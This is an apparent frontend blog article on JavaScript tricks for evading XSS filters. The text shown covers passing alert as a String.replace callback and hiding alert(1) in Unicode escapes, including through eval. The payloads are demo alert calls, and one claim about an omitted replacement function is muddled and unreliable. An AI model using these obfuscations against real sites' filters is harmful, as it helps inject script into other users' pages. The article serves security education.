7 Surprising JavaScript Tricks to Bypass XSS Filters
This article reveals a collection of unconventional JavaScript techniques—including regex replacement, Unicode escapes, eval tricks, unusual operator combinations, custom getters/setters, and URL‑encoded payloads—that can evade common XSS filters and strengthen your understanding of web security.
0 Introduction
XSS (Cross‑Site Scripting) attacks inject JavaScript into web pages, and many sites filter such payloads. The article demonstrates several creative JavaScript tricks that can bypass these filters, offering insight for both attackers and defenders.
1 Regex Replacement Executable Code
When
.replacereceives a function as the second argument, the matched text is passed as a parameter, allowing code execution. Example:
<code>'XSS'.replace(/XSS/g, alert)</code>This call is equivalent to
alert('XSS'). By using a function placeholder, the attacker can trigger native functions directly.
Another example shows a custom function receiving the match:
<code>'somestring'.replace(/some/, function($1){ /* do something */ })</code>When the replacement function is omitted, the browser may invoke a built‑in function like
alert, which can be leveraged to bypass filters.
2 Unicode Escape
Unicode escape sequences can represent characters without using their literal form. For instance:
<code>\u0061\u006c\u0065\u0072\u0074(1)</code>Evaluates to
alert(1). Mixed with normal characters, these escapes can further obscure payloads, e.g.:
<code>\u0061lert(1)</code>Using
evalon concatenated Unicode strings can execute hidden code:
<code>eval('\u'+'0061'+'lert(1)')</code>Tencent IMWeb Frontend Team
IMWeb Frontend Community gathering frontend development enthusiasts. Follow us for refined live courses by top experts, cutting‑edge technical posts, and to sharpen your frontend skills.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.